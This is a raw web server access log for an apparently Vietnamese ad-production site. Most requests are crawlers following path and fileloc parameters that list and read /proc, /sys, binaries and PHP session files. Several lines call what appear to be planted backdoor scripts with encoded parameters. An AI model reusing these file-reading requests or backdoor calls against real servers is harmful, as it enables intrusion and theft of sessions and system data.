74.7.227.51 - - [09/Nov/2025:00:02:33 +0000] "GET /81khxl16173.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:02:34 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/cpu0/subsystem/drivers/processor/cpu0/hotplug HTTP/1.0" 200 3364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.209.100.30 - - [09/Nov/2025:00:02:34 +0000] "GET /our-works/tvc-calci/?fileloc=//proc/self/projid_map&path=//proc/self HTTP/1.0" 200 2841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:02:36 +0000] "GET /33lty44905.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:02:36 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu0/firmware_node/subsystem/drivers/battery HTTP/1.0" 200 3358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:02:37 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/sched&path=//proc/2 HTTP/1.0" 200 3211 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [09/Nov/2025:00:00:15 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303031302p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634363431302q3238333762666662386262346361643135383363313333316638643236323434222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
54.225.181.161 - - [09/Nov/2025:00:02:38 +0000] "GET /our-works/tvc-bia-hello/?path=//lib/python3.8/email HTTP/1.0" 200 4096 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:00:02:38 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Finput%2Fevent2%2Fsubsystem%2Finput1%2Fsubsystem%2Finput1%2Fevent1%2Fdevice%2Fuevent&path=%2F%2Fsys%2Fclass%2Finput%2Fevent2%2Fsubsystem%2Finput1%2Fsubsystem%2Finput1%2Fevent1%2Fdevice HTTP/1.0" 200 3168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:02:38 +0000] "GET /95hswzm46447.html?path=/var/www/lamphim/data HTTP/1.0" 200 3493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:02:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu1/subsystem/drivers/processor/cpu0/driver HTTP/1.0" 200 3456 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:02:41 +0000] "GET /82hwj30848.html?path=/var/www/lamphim/data/php-bin HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:02:41 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/schedstat&path=//proc/2 HTTP/1.0" 200 2840 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:02:42 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/cpu1/driver/cpu0/subsystem/drivers/processor HTTP/1.0" 200 3456 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.209.174.110 - - [09/Nov/2025:00:02:42 +0000] "GET /our-works/tvc-bia-hello/?path=//usr/share/debconf HTTP/1.0" 200 3383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:02:42 +0000] "GET /98hkmw32668.html?path=/var/www/lamphim/data/email HTTP/1.0" 200 2907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:02:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/cpu1/subsystem/drivers/processor/cpu1/driver HTTP/1.0" 200 3452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:02:44 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/smaps&path=//proc/2 HTTP/1.0" 200 2819 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:02:45 +0000] "GET /98hkmw32668.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
50.16.248.61 - - [09/Nov/2025:00:02:45 +0000] "GET /our-works/tvc-bia-hello/?path=//lib/python3.8/email HTTP/1.0" 200 4096 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:02:46 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/cpu0/driver/cpu1/subsystem/drivers/processor HTTP/1.0" 200 3456 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.218 - - [09/Nov/2025:00:02:47 +0000] "GET /?products=431110192 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:02:48 +0000] "GET /230zqm2334.html?path=/var/www/lamphim/data HTTP/1.0" 200 3493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:02:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/smaps_rollup&path=//proc/2 HTTP/1.0" 200 2825 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:02:51 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/cpu1/driver/cpu0/subsystem/drivers/processor HTTP/1.0" 200 3458 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.209.89.189 - - [09/Nov/2025:00:02:51 +0000] "GET /our-works/tvc-calci/?fileloc=//proc/self/projid_map&path=//proc/self HTTP/1.0" 200 2841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:02:52 +0000] "GET /91cpv13181.html?path=/var/www/lamphim/data HTTP/1.0" 200 3493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:02:55 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fzoneinfo%2FMexico HTTP/1.0" 200 3310 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.128.139 - - [09/Nov/2025:00:02:55 +0000] "GET /q-~69loEjGuFyBEDvas7fvym2JZmbKuhokC33394/ HTTP/1.0" 200 4760 "https://lamphimquangcao.net/sitemap546.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
3.215.59.93 - - [09/Nov/2025:00:02:56 +0000] "GET /our-works/tvc-kimino/?path=//var/lock/apache2 HTTP/1.0" 200 2881 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:02:56 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/driver/cpu1/subsystem/drivers/processor HTTP/1.0" 200 3455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:02:57 +0000] "GET /95hswzm46447.html?path=/var/www/lamphim/data/php-bin HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:02:57 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/stack&path=//proc/2 HTTP/1.0" 200 2819 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
100.24.149.244 - - [09/Nov/2025:00:02:59 +0000] "GET /our-works/tvc-bia-hello/?path=//usr/share/debconf HTTP/1.0" 200 3383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:02:59 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu0/driver/cpu1/subsystem/drivers/processor HTTP/1.0" 200 3456 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:00 +0000] "GET /82hwj30848.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:00:39 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303033382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634363433382q6530623962343463336466616138306438626433383235636661623031653136222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
79.137.67.30 - - [09/Nov/2025:00:03:01 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/stat&path=//proc/2 HTTP/1.0" 200 2886 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.93.253.174 - - [09/Nov/2025:00:03:02 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//usr/bin/view&path=//usr/bin HTTP/1.0" 200 2819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:03:02 +0000] "GET /202tii6764.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:03:03 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/cpu1/subsystem/drivers/processor/cpu1/driver HTTP/1.0" 200 3452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:04 +0000] "GET /230zqm2334.html?path=/var/www/lamphim/data/php-bin HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:03:04 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/statm&path=//proc/2 HTTP/1.0" 200 2823 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.212.205.90 - - [09/Nov/2025:00:03:05 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/nsenter&path=//usr/bin HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:03:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu0/subsystem/drivers/processor/cpu0/firmware_node HTTP/1.0" 200 3627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:07 +0000] "GET /98hkmw32668.html?fileloc=/var/www/lamphim/data/tmp/sess_hmhdt5bfd05eied64501e83fnn&path=/var/www/lamphim/data/tmp HTTP/1.0" 200 2886 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:03:07 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory12/node0/cpu0/subsystem/drivers/processor/cpu1/driver HTTP/1.0" 200 3454 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:03:08 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fproc%2F3264%2Ftask%2F3264%2Froot%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftap%2F__pycache__ HTTP/1.0" 404 462 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
79.137.67.30 - - [09/Nov/2025:00:03:08 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/status&path=//proc/2 HTTP/1.0" 200 3115 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:03:08 +0000] "GET /91cpv13181.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.84.93.8 - - [09/Nov/2025:00:03:09 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/nsenter&path=//usr/bin HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:03:09 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/cpu0/subsystem/drivers/processor/cpu0/driver HTTP/1.0" 200 3449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:10 +0000] "GET /98hkmw32668.html?path=/var/www/lamphim/data/php-bin HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:03:11 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/syscall&path=//proc/2 HTTP/1.0" 200 2821 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:03:12 +0000] "GET /95hswzm46447.html?path=/var/www/lamphim/data/email HTTP/1.0" 200 2907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:03:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/driver/cpu0/subsystem/drivers/processor HTTP/1.0" 200 3458 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.28.204.82 - - [09/Nov/2025:00:03:13 +0000] "GET /our-works/phim-viral-ila/?fileloc=//bin/col3&path=//bin HTTP/1.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:03:14 +0000] "GET /202tii6764.html?fileloc=/var/www/lamphim/data/tmp/sess_4mpcnnlhcld5pbumtk8to1engn&path=/var/www/lamphim/data/tmp HTTP/1.0" 200 2933 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:03:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/cpu1/subsystem/drivers/processor/cpu1/driver HTTP/1.0" 200 3450 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:03:15 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/timers&path=//proc/2 HTTP/1.0" 200 2819 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
69.197.179.242 - - [09/Nov/2025:00:01:17 +0000] "GET /wp-includes/addc3d4c/edit.php?id=401440 HTTP/1.0" 200 166 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php?id=401440" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.51 - - [09/Nov/2025:00:03:16 +0000] "GET /91cpv13181.html?path=/var/www/lamphim/data/php-bin HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.194.233.48 - - [09/Nov/2025:00:03:16 +0000] "GET /video/san-xuat-phim-quang-cao/?fileloc=//bin/sg_rmsn&path=//bin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:03:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/cpu1/subsystem/drivers/processor/cpu0/hotplug HTTP/1.0" 200 3371 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:17 +0000] "GET /178hpr1480.html?path=/var/www/lamphim/data HTTP/1.0" 200 3493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:03:17 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/timerslack_ns&path=//proc/2 HTTP/1.0" 200 2825 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:03:18 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu1/driver/cpu1/subsystem/drivers/processor HTTP/1.0" 200 3455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:18 +0000] "GET /230zqm2334.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:03:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu1/subsystem/drivers/processor/cpu1/driver HTTP/1.0" 200 3453 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:20 +0000] "GET /42cmm48234.html?path=/var/www/lamphim/data HTTP/1.0" 200 3493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:03:20 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/uid_map&path=//proc/2 HTTP/1.0" 200 2836 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.203.152.231 - - [09/Nov/2025:00:03:22 +0000] "GET /video/san-xuat-phim-quang-cao/?fileloc=//bin/sg_rmsn&path=//bin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:03:22 +0000] "GET /48ahu49714.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:03:23 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/cpu0/driver/cpu1/subsystem/drivers/processor HTTP/1.0" 200 3457 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:01:02 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303036312p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634363436312q3838393837613831373166623561646338633663656639633432383738386462222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
79.137.67.30 - - [09/Nov/2025:00:03:25 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/2/wchan&path=//proc/2 HTTP/1.0" 200 2820 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:03:26 +0000] "GET /33skl42333.html?path=/var/www/lamphim/data HTTP/1.0" 200 3493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:03:26 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fzoneinfo%2Fleap-seconds.list&path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fzoneinfo HTTP/1.0" 200 5192 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:00:03:27 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu0/subsystem/drivers/processor/cpu0/firmware_node/subsystem HTTP/1.0" 200 3483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.232.11.247 - - [09/Nov/2025:00:03:27 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/calendar&path=//usr/bin HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:03:29 +0000] "GET /21mjm32689.html?path=/var/www/lamphim/data HTTP/1.0" 200 3493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.45.15.233 - - [09/Nov/2025:00:03:29 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/calendar&path=//usr/bin HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
79.137.67.30 - - [09/Nov/2025:00:03:29 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/arch_status&path=//proc/20 HTTP/1.0" 200 2824 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:03:30 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu0/subsystem/drivers/processor/cpu0/firmware_node/power HTTP/1.0" 200 3653 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:30 +0000] "GET /265ixn1621.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:03:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/cpu0/driver/cpu0/subsystem/drivers/processor HTTP/1.0" 200 3452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:32 +0000] "GET /66uja30200.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:03:33 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/autogroup&path=//proc/20 HTTP/1.0" 200 2822 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
